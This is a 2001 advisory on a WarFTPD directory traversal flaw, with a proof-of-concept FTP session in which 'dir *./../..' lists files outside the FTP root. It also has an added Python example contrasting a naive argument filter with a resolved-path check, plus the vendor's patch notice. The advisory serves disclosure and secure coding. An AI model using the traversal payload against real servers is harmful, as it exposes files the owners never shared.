War FTPD Win32 1.67b04 Allows Directory Traversal

A vulnerability exists that lets an attacker break out of FTP root by using relative paths.

Ken Pfeil

March 5, 2001


Reported March 6, 2001, by [email protected].

VERSION AFFECTED

  • Jgaa’s Internet WarFTPD Win32 1.67b04

DESCRIPTION

A vulnerability exists that lets an attacker break out of the FTP root by using relative paths. For example, by connecting to a vulnerable host and issuing the command “dir *./../..”, an attacker can list the contents of the directory one level up from the root directory.

DEMONSTRATION

[email protected] provided the following proof-of-concept scenario:

Verbindung mit 10.17.3.44 wurde hergestellt.
220-Jgaa's Fan Club FTP Service WAR-FTPD 1.67-04 Ready
220 Please enter your user name.
Benutzer (10.17.3.44:(none)): anonymous
331 User name okay. Give your full Email address as password.
Kennwort:
230 User logged in, proceed.
ftp> dir
200 Port command okay.
150 Opening ASCII NO-PRINT mode data connection for ls -l.
total 123
drwxrwxrwx 1 ftp ftp 0 Mar 2 12:17 test
-rwxrwxrwx 1 ftp ftp 6 Mar 2 12:33 movedtohomedir.txt
-rwxrwxrwx 1 ftp ftp 11 Mar 2 00:29 bisontest.txt
drwxrwxrwx 1 ftp ftp 0 Mar 3 15:59 HTTP
drwxrwxrwx 1 ftp ftp 0 Mar 3 17:05 huhu
drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 te
drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 ..te
226 Transfer finished successfully. Data connection closed.
FTP: 452 Bytes empfangen in 0,02Sekunden 22,60KB/s
ftp> cd ..
550 Permission denied.
ftp> dir *./../..
200 Port command okay.
150 Opening ASCII NO-PRINT mode data connection for ls *./../...
total 123
-rwxrwxrwx 1 ftp ftp 251658240 Mar 4 18:42 WIN386.SWP
drwxrwxrwx 1 ftp ftp 0 Jan 6 20:32 games
drwxrwxrwx 1 ftp ftp 0 Jan 7 19:58 HalfLife
226 Transfer finished successfully. Data connection closed.
FTP: 2977 Bytes empfangen in 0,07Sekunden 42,53KB/s
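The session above shows the pattern that matters for anyone writing or auditing a file server: "cd .." is refused, yet "dir *./../.." succeeds, so the refusal is evidently applied to the argument text rather than to the path the argument actually resolves to. The following example, added here and not taken from WarFTPD or from the advisory, contrasts a hypothetical argument-level filter with a check made on the fully resolved path. The root directory, the working directory and the helper names are all constructed for the example. On a Windows server the same check must be made after backslashes and drive-relative forms have been canonicalized; posixpath is used here only to keep the example portable.

```python
import posixpath


def naive_is_allowed(arg: str) -> bool:
    """Hypothetical argument-level filter, constructed for this example.

    It refuses only arguments that begin with '..', and is NOT a claim about
    how WarFTPD implemented its check. It exists to show that inspecting the
    raw argument cannot catch a traversal hidden behind a wildcard component.
    """
    return not arg.startswith("..")


def resolve_ftp_path(root: str, cwd: str, arg: str) -> str:
    """Map an FTP path argument to a filesystem path confined to root.

    root: filesystem directory exported as the FTP root (assumed "/srv/ftp").
    cwd:  the client's virtual working directory, absolute, "/" = FTP root.
    arg:  the LIST/DIR/CWD argument as typed; it may contain glob characters.

    Glob components such as "*." are kept as plain names, so a following ".."
    climbs out of them exactly as the server in the advisory did. The decision
    is taken on the normalized result, which is the only thing that reflects
    where the request really lands.
    """
    root_norm = posixpath.normpath(root)
    # Relative arguments resolve against the client's virtual cwd; an absolute
    # argument replaces it (posixpath.join discards earlier parts in that case).
    virtual = posixpath.join(cwd, arg)
    # Prepend the real root BEFORE normalizing, so that ".." components which
    # would climb above the root remain visible instead of being clamped away.
    fs_path = posixpath.normpath(posixpath.join(root_norm, virtual.lstrip("/")))
    if fs_path != root_norm and not fs_path.startswith(root_norm + "/"):
        raise PermissionError(f"argument resolves outside the FTP root: {arg!r}")
    return fs_path


if __name__ == "__main__":
    ROOT = "/srv/ftp"  # constructed for the example
    for cwd, arg in [("/", "test"), ("/huhu", "../test"), ("/", "*"),
                     ("/", ".."), ("/", "*./../..")]:
        try:
            print(f"{cwd!r} {arg!r:14} -> {resolve_ftp_path(ROOT, cwd, arg)}")
        except PermissionError as exc:
            print(f"{cwd!r} {arg!r:14} -> refused ({exc})")
```

Run stand-alone, the script accepts "test", "../test" from a subdirectory and a bare "*" listing, and refuses both ".." and "*./../..", because the last two both normalize to /srv, which is outside /srv/ftp. The hypothetical naive filter would have passed "*./../..", which is the shape of mistake the advisory's transcript exposes.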

VENDOR RESPONSE

The vendor, Jgaa’s Internet, has released version 1.67b05, which corrects this issue. It is available at http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=32.

CREDIT
Discovered by [email protected].
